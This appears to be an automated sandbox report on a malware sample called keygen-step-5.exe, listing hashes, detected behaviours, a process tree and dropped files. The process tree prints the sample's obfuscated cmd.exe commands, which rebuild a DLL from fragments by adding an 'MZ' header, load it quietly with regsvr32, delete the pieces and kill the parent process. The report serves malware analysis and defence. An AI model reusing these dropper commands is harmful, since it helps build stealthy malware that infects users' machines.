Analysis

  • max time kernel
    139s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-11-2024 08:20

General

  • Target

    keygen-step-5.exe

  • Size

    1.9MB

  • MD5

    3b7a3bba78f866019d4addccffcf3942

  • SHA1

    a1a467cc72b2b0b5678aed806435ab4e4f3a232e

  • SHA256

    c9022d72e11ce317a5edd37195ac5e7aac341e1df29792f04d2c181eac6dea1b

  • SHA512

    86978fd7b9f92338c6328494c00032b400ce596952df266b3123ed949ef7324708ae03927739c4686efdb89727f8e0a89147a6367bb3485290ba84ef9406c469

  • SSDEEP

    24576:q9qFtP8Q12rlO5Onp6iMsKmLYcX7Kx6BPLNtszaEvxAirQuPZY88PDR3YWff8yP0:N1clGWIiSmVOEBwzacxAir/RYBDu/3uw

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe
    "C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1840
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C typE "C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" > ..\yCLcV_JUHy~2UXJ.ExE && STaRT ..\YCLCV_JUHY~2UXJ.ExE -PdpV4tWBoTeEAefzfcz & IF ""=="" for %I IN ("C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" ) do taskkill /iM "%~NxI" -F > nUl
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Users\Admin\AppData\Local\Temp\yCLcV_JUHy~2UXJ.ExE
        ..\YCLCV_JUHY~2UXJ.ExE -PdpV4tWBoTeEAefzfcz
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3972
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /Q /C typE "C:\Users\Admin\AppData\Local\Temp\yCLcV_JUHy~2UXJ.ExE" > ..\yCLcV_JUHy~2UXJ.ExE && STaRT ..\YCLCV_JUHY~2UXJ.ExE -PdpV4tWBoTeEAefzfcz & IF "-PdpV4tWBoTeEAefzfcz "=="" for %I IN ("C:\Users\Admin\AppData\Local\Temp\yCLcV_JUHy~2UXJ.ExE" ) do taskkill /iM "%~NxI" -F > nUl
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2104
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /q /C ecHo %randoM%XyyM> S7YcxJ2.x & EcHO | seT /P = "MZ" > CepfIAXQ.8 & copY /Y /b cepfIAXQ.8 + KQTlyS.E +DPSBV.B+ P8AkH.lP + TE2K.C + 7_7S.4tB + _AqLYN6~.KN + 12UX9.H4T + S7YcxJ2.x ..\ID5A1C.7a > nUl & starT regsvr32.exe /S ..\ID5A1C.7A & dEl /q * > nuL
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" EcHO "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3604
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>CepfIAXQ.8"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2532
          • C:\Windows\SysWOW64\regsvr32.exe
            regsvr32.exe /S ..\ID5A1C.7A
            5⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2676
            • C:\Users\Admin\AppData\Local\Temp\e58b745.exe
              "C:\Users\Admin\AppData\Local\Temp\e58b745.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2960
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 808
                7⤵
                • Program crash
                PID:1884
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /iM "keygen-step-5.exe" -F
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2960 -ip 2960
    1⤵
      PID:1136

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\7_7s.4tB

      Filesize

      77KB

      MD5

      0487f0b988b3a89a1f8c0a280d35c668

      SHA1

      9c29a470b5f0ea99105f9d25766b65e8ebdcf3d2

      SHA256

      2a84fa9c15c71cf185d1e3031a72f0d1559adf556455e0875cda55bab553b66b

      SHA512

      35c637a87883c0e4d429a19e11816b737ea05f37566ceeb22d9fd2c36ef568fb2ba699b10f23d276f640114ef3c1cc56481c0701046ad13a83fdf2693f6a35d6

    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\CepfIAXQ.8

      Filesize

      2B

      MD5

      ac6ad5d9b99757c3a878f2d275ace198

      SHA1

      439baa1b33514fb81632aaf44d16a9378c5664fc

      SHA256

      9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

      SHA512

      bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\DpsBv.B

      Filesize

      428KB

      MD5

      9a66c3b6836700f26deb13b6d37aa4b6

      SHA1

      013ecc7e28dd831c89660dd8dd042e7ea3dc9d2d

      SHA256

      3ee047a4b812813f4777bac2f92a91849ab4519836076443c314ee296cba5ba9

      SHA512

      1bccc6459a8e3190b542b04a15a8820bc27bb545f891d910badca3b18bceaea34fd046b1a651558fdbfbdbb7d1a93d7fdeb3a471e0903556c7c9910b77e4dc73

    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\KQTlyS.E

      Filesize

      86KB

      MD5

      f4f7afc50a289cc67f88772c2aa9c2fa

      SHA1

      4b0126fb5baa302c18334f504e03a2d4c6e9c802

      SHA256

      909f5d21d276cc1fc644dd57dcbabd4b25e02c6fc6888fafed04bb0a7ddb6fbd

      SHA512

      0f73f5426c7e467eb0c03cb385571ba5bffed78f23743269be97336b11ed96d5f339a9a1173657f83b814621dd6109d26b8ac1fdb7864ef5497ffe55474afd66

    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\P8Akh.lP

      Filesize

      302KB

      MD5

      9a8e502f75614d00263a8ca83644f554

      SHA1

      1253d6b6386492c57191c6985e3643d7138cb939

      SHA256

      3dca184debb9b047947d7b4689fe4db0c520ea330f6eee8a7780433b083eb37a

      SHA512

      463ffc7f2c3d157215b64977fb60f0084884d6301c14988b37e89a4cf855df508f1e94d8fb3404f6f63711c5086e30dbb721c3489983dca786385a79bcae736f

    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\_AqLYN6~.kN

      Filesize

      154KB

      MD5

      e22775ce37deb96f373634c481830799

      SHA1

      7411eb24d3c5e197627d81e20f3a4551a040c166

      SHA256

      36e2aeeceb8aa59e823f13e7bdbd6af8700ffd18f16a4d724991ecf31eb8dd6a

      SHA512

      7b42cf7339e5c0e17dca42629a7df2d732c0b13f092269508b250772f4d1c64d40dd644b4639d4e1884573526a4b0bf3f646e0e2fa585d88b0723dbd6c7affbc

    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\te2K.c

      Filesize

      123KB

      MD5

      dbb25fece40a910dd4da12cf29d32392

      SHA1

      0f42f363bb3458b0bf5ff9dcd1ff9a8615baa6fd

      SHA256

      0ffc3aeb41340555ec116f4c0e0004d37de7130613b19bbb3704be551234b57d

      SHA512

      f07918a776c5f4f62b5a2ed1611aedb79eef5dc1982dd8727477f4b5c233870df6e3a82acef7691bb8d14d5f65d4919ae80351103e6e39e09b699a87748a1635

    • C:\Users\Admin\AppData\Local\Temp\e58b745.exe

      Filesize

      21KB

      MD5

      858939a54a0406e5be7220b92b6eb2b3

      SHA1

      da24c0b6f723a74a8ec59e58c9c0aea3e86b7109

      SHA256

      a30f30a109cb78d5eb1969f6c13f01a1e0a5f07b7ad8b133f5d2616223c1ce0a

      SHA512

      8875d1e43ea59314695747796894a2f171e92f7b04024dbc529af1497331489e279cd06ea03061288089d2f07ad437178b9d62f0bae2e16ae0b95c5681569401

    • C:\Users\Admin\AppData\Local\Temp\yCLcV_JUHy~2UXJ.ExE

      Filesize

      1.9MB

      MD5

      3b7a3bba78f866019d4addccffcf3942

      SHA1

      a1a467cc72b2b0b5678aed806435ab4e4f3a232e

      SHA256

      c9022d72e11ce317a5edd37195ac5e7aac341e1df29792f04d2c181eac6dea1b

      SHA512

      86978fd7b9f92338c6328494c00032b400ce596952df266b3123ed949ef7324708ae03927739c4686efdb89727f8e0a89147a6367bb3485290ba84ef9406c469

    • memory/2676-36-0x000000002DBC0000-0x000000002DC5A000-memory.dmp

      Filesize

      616KB

    • memory/2676-46-0x000000002E760000-0x000000002E7EF000-memory.dmp

      Filesize

      572KB

    • memory/2676-39-0x000000002DBC0000-0x000000002DC5A000-memory.dmp

      Filesize

      616KB

    • memory/2676-40-0x00000000029D0000-0x00000000039D0000-memory.dmp

      Filesize

      16.0MB

    • memory/2676-43-0x000000002DBC0000-0x000000002DC5A000-memory.dmp

      Filesize

      616KB

    • memory/2676-44-0x000000002DC60000-0x000000002E6A2000-memory.dmp

      Filesize

      10.3MB

    • memory/2676-45-0x000000002E6B0000-0x000000002E743000-memory.dmp

      Filesize

      588KB

    • memory/2676-35-0x0000000002910000-0x00000000029BE000-memory.dmp

      Filesize

      696KB

    • memory/2676-49-0x000000002E760000-0x000000002E7EF000-memory.dmp

      Filesize

      572KB

    • memory/2676-50-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

      Filesize

      4KB

    • memory/2676-51-0x0000000000AD0000-0x0000000000AD4000-memory.dmp

      Filesize

      16KB

    • memory/2676-52-0x0000000000AE0000-0x0000000000AE6000-memory.dmp

      Filesize

      24KB

    • memory/2676-34-0x00000000029D0000-0x00000000039D0000-memory.dmp

      Filesize

      16.0MB

    • memory/2960-69-0x0000000000E50000-0x0000000000E58000-memory.dmp

      Filesize

      32KB